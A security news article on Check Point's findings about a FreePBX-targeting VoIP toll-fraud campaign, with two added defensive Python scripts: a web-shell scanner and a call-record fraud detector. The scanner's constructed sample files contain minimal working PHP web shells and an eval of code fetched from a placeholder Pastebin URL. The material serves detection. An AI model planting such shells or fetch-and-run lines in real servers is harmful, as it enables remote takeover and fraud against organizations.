Check Point Research uncovered a cyber fraud campaign operated from Gaza, Egypt, and the West Bank. Over the past year, the attackers compromised the VoIP (Voice over Internet Protocol) servers of more than 1,200 organizations in 60 countries.
Researchers believe the threat actors are located in the Palestinian Gaza Strip. They target Sangoma's FreePBX, an open-source web interface used to manage and configure Asterisk VoIP phone systems, and specifically the Session Initiation Protocol (SIP) servers those systems expose.
In their report, Check Point researchers noted that “there appears to be a systematic exploitation pattern of SIP servers from different manufacturers,” and that the campaign seems to be part of a “large, profitable business model run by hackers.”
Asterisk is a widely used open-source VoIP PBX (private branch exchange), deployed for telecommunication by a majority of Fortune 500 firms. A PBX is a switching system that establishes and controls phone calls between telecommunication endpoints: PSTN (public switched telephone network) destinations, ordinary telephone sets, and services or devices on VoIP networks.
According to the researchers, the attackers exploit a critical vulnerability in Sangoma's software, CVE-2019-19006, an authentication bypass in the administrator web interface of FreePBX and PBXact. By sending specially crafted requests to the targeted server, an attacker gains admin access to any unpatched system without valid credentials.
The campaign begins with scanning, proceeds to exploitation of the vulnerability, and culminates in the installation of a web shell. Once they have access, the attackers can abuse the servers for whatever they intend.
The attackers use the SIPVicious tool suite, which is built for auditing SIP-based VoIP systems. Its svmap module scans address ranges for SIP servers and identifies them; where a system runs a vulnerable FreePBX version, the attackers exploit CVE-2019-19006.
One of the most interesting, and hardest to detect, forms of exploitation is using the compromised servers to place outgoing phone calls for profit. Because outbound calls are a legitimate function of a PBX, it is difficult to tell whether the server is being abused or simply doing its job.
In another attack flow, Check Point researchers found that the hackers used an initial PHP web shell to gain control of the FreePBX system's database and pull the passwords of its SIP extensions. This gives them unrestricted access to the whole system: they can place calls from every extension.
A second variant uses the initial web shell to download a base64-encoded PHP file. Once decoded, the file launches a web panel that lets the attacker place calls from the compromised system (it supports both Elastix and FreePBX) and run hard-coded as well as arbitrary commands.
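A practitioner responding to the two web shell flows above would want to hunt for them on disk. The scanner below is an added example, not code from the original article or from Check Point: it decodes base64 literals passed to base64_decode() (recursing into nested encodings), flags command-execution functions fed by request parameters, and flags references to pastebin.com. The indicator set, the file paths and the file contents are constructed for illustration and are not the campaign's artifacts.

```python
import base64
import re
from typing import Dict, List

# Indicators used by this example (an assumption, not a published signature
# set): a command-execution function, a request superglobal, a long base64
# literal handed to base64_decode(), and a pastebin.com reference.
DANGEROUS = re.compile(r"\b(eval|system|exec|shell_exec|passthru|popen|proc_open|assert)\s*\(")
SUPERGLOBAL = re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\b")
B64_LITERAL = re.compile(r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=\s]{40,})['\"]")
PASTEBIN = re.compile(r"https?://(?:www\.)?pastebin\.com/", re.IGNORECASE)


def decode_layers(src: str, depth: int = 3) -> List[str]:
    """Return every plaintext recovered from base64_decode('...') literals in
    src, recursing into the decoded text so nested encodings are also seen."""
    found: List[str] = []
    if depth == 0:
        return found
    for m in B64_LITERAL.finditer(src):
        blob = re.sub(r"\s+", "", m.group(1))
        try:
            decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
        except ValueError:
            continue  # not valid base64; ignore this literal
        found.append(decoded)
        found.extend(decode_layers(decoded, depth - 1))
    return found


def scan_php(src: str) -> List[str]:
    """Return the reasons a PHP source looks like a web shell (empty if none)."""
    reasons: List[str] = []
    if DANGEROUS.search(src) and SUPERGLOBAL.search(src):
        reasons.append("command-execution function with request-controlled input")
    for decoded in decode_layers(src):
        hit = DANGEROUS.search(decoded)
        if hit:
            reasons.append(f"base64 literal decodes to code calling {hit.group(1)}()")
    if PASTEBIN.search(src):
        reasons.append("fetches content from pastebin.com")
    return reasons


def scan_tree(files: Dict[str, str]) -> Dict[str, List[str]]:
    """Scan a {path: source} mapping and return only the flagged entries."""
    flagged: Dict[str, List[str]] = {}
    for path, src in files.items():
        reasons = scan_php(src)
        if reasons:
            flagged[path] = reasons
    return flagged


# Constructed sample files standing in for a FreePBX web root. Paths, contents
# and the pastebin URL are placeholders for illustration only.
INNER_SHELL = b"<?php if (isset($_GET['cmd'])) { system($_GET['cmd']); } ?>"
SAMPLE_FILES = {
    "admin/modules/core/functions.inc.php":
        "<?php\nfunction core_get_config($engine) {\n    return true;\n}\n",
    "admin/assets/.cache.php":
        "<?php eval(base64_decode('" + base64.b64encode(INNER_SHELL).decode() + "')); ?>",
    "admin/upload.php":
        "<?php $c = $_POST['c']; if ($c) { passthru($c); } ?>",
    "admin/update.php":
        "<?php $code = file_get_contents('https://pastebin.com/raw/xxxxxxxx'); eval($code); ?>",
}

if __name__ == "__main__":
    for path, reasons in scan_tree(SAMPLE_FILES).items():
        print(path)
        for reason in reasons:
            print("  -", reason)
```

On a real host, feed scan_tree() the contents of every .php file under the FreePBX web root (and any recently modified file elsewhere on the web tree), and review hits by hand: the rules are deliberately broad, so a legitimate module that calls exec() with sanitized request input will also surface.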
The campaign relies extensively on Pastebin for downloading password-protected web shells, which is why Check Point's researchers believe it could be the work of an uploader known as INJ3CTOR3. This actor is linked to an earlier SIP remote code execution vulnerability (CVE-2014-7235) and to several private Facebook groups used to share SIP server exploits.
Researchers noted that the hacked VoIP servers are used to call International Premium Rate Numbers (IPRNs). These are premium numbers that businesses use to sell phone-based purchases or services, for instance charging a higher rate for the time a caller spends on hold.
The party placing the call pays the premium fee, so the more calls an IPRN owner receives, and the longer callers are kept on the line before completing a transaction, the larger the amount billed to the calling customers and their telecom providers. With a hijacked PBX, the calling party footing that bill is the victim organization.
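Because outbound calls are legitimate PBX traffic, the practical check for the IPRN abuse described above runs over call detail records rather than network signatures. The script below is an added example, not code from the original article or from Check Point: it applies three rules to constructed CDR rows, a destination on a premium-rate watchlist, an international call outside business hours, and a burst of international calls from a single extension. The international dialing prefixes, the watchlist, the business-hours window and the sample rows are all assumptions of this example; a real deployment takes the prefixes from its outbound routes and the watchlist from its carrier or a fraud feed.

```python
from collections import Counter, defaultdict
from datetime import datetime, timedelta
from typing import Dict, List, Tuple

# Constructed CDR rows (a simplified subset of Asterisk Master.csv fields:
# source extension, dialed number, start time, billable seconds, disposition).
# Illustrative data, not records from the campaign. 2020-11-07 is a Saturday.
CDR_ROWS = [
    ("1002", "2125550134",     "2020-11-05 10:12:03",  184, "ANSWERED"),
    ("1002", "0014155550100",  "2020-11-05 11:05:40",   95, "ANSWERED"),
    ("1002", "2125550199",     "2020-11-05 16:40:10",   60, "ANSWERED"),
    ("1001", "00882123456789", "2020-11-07 03:02:11", 1810, "ANSWERED"),
    ("1001", "00882123456790", "2020-11-07 03:04:57", 1790, "ANSWERED"),
    ("1001", "00882123456791", "2020-11-07 03:06:20", 1805, "ANSWERED"),
    ("1001", "00882123456792", "2020-11-07 03:09:03", 1780, "ANSWERED"),
    ("1001", "00882123456793", "2020-11-07 03:11:48", 1800, "ANSWERED"),
    ("1001", "00882123456794", "2020-11-07 03:14:30",    0, "NO ANSWER"),
]

# Assumptions of this example: how international calls are dialed on this
# PBX, which country/network codes are treated as premium-rate, and when
# staff are expected to be placing calls.
INTL_PREFIXES = ("+", "011", "00")
PREMIUM_WATCHLIST = ("882", "883", "252", "371")
BUSINESS_HOURS = range(7, 20)  # 07:00-19:59, Monday to Friday


def split_international(dst: str) -> Tuple[str, bool]:
    """Strip the international prefix; return (number, is_international)."""
    for prefix in INTL_PREFIXES:
        if dst.startswith(prefix):
            return dst[len(prefix):], True
    return dst, False


def detect(rows, burst_n: int = 5, window: timedelta = timedelta(hours=1)) -> List[Tuple[str, str, str]]:
    """Return (extension, rule, detail) alerts for answered international calls."""
    alerts: List[Tuple[str, str, str]] = []
    intl_starts: Dict[str, List[datetime]] = defaultdict(list)
    for src, dst, start, billsec, disposition in rows:
        if disposition != "ANSWERED":
            continue  # unanswered calls cost nothing; ignore them here
        number, intl = split_international(dst)
        if not intl:
            continue
        ts = datetime.strptime(start, "%Y-%m-%d %H:%M:%S")
        intl_starts[src].append(ts)
        prefix = next((p for p in PREMIUM_WATCHLIST if number.startswith(p)), None)
        if prefix:
            alerts.append((src, "premium_prefix", f"{dst} matches +{prefix}, {billsec}s billed"))
        if ts.hour not in BUSINESS_HOURS or ts.weekday() >= 5:
            alerts.append((src, "off_hours_intl", f"{dst} at {start}"))
    # Burst rule: burst_n or more answered international calls from one
    # extension inside a sliding window, reported once per extension.
    for src, starts in intl_starts.items():
        starts.sort()
        for i, first in enumerate(starts):
            in_window = sum(1 for t in starts[i:] if t - first <= window)
            if in_window >= burst_n:
                alerts.append((src, "intl_burst", f"{in_window} international calls within {window} from {first}"))
                break
    return alerts


def alert_counts(alerts) -> Counter:
    """Summarize alerts as {(extension, rule): count} for triage."""
    return Counter((src, rule) for src, rule, _ in alerts)


if __name__ == "__main__":
    for src, rule, detail in detect(CDR_ROWS):
        print(f"{src}\t{rule}\t{detail}")
```

Run it over the real CDR table (or Master.csv) on a schedule; an extension that suddenly produces premium-prefix or off-hours alerts, or a burst, is the signal the article says is otherwise hard to see, and the per-extension summary from alert_counts() points straight at the SIP credentials to rotate.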
The operators also offer the compromised businesses' call plans, phone numbers, and live access to the hacked VoIP services for sale to the highest bidder. So far they have made hundreds of thousands of dollars in profit, in addition to eavesdropping on phone calls.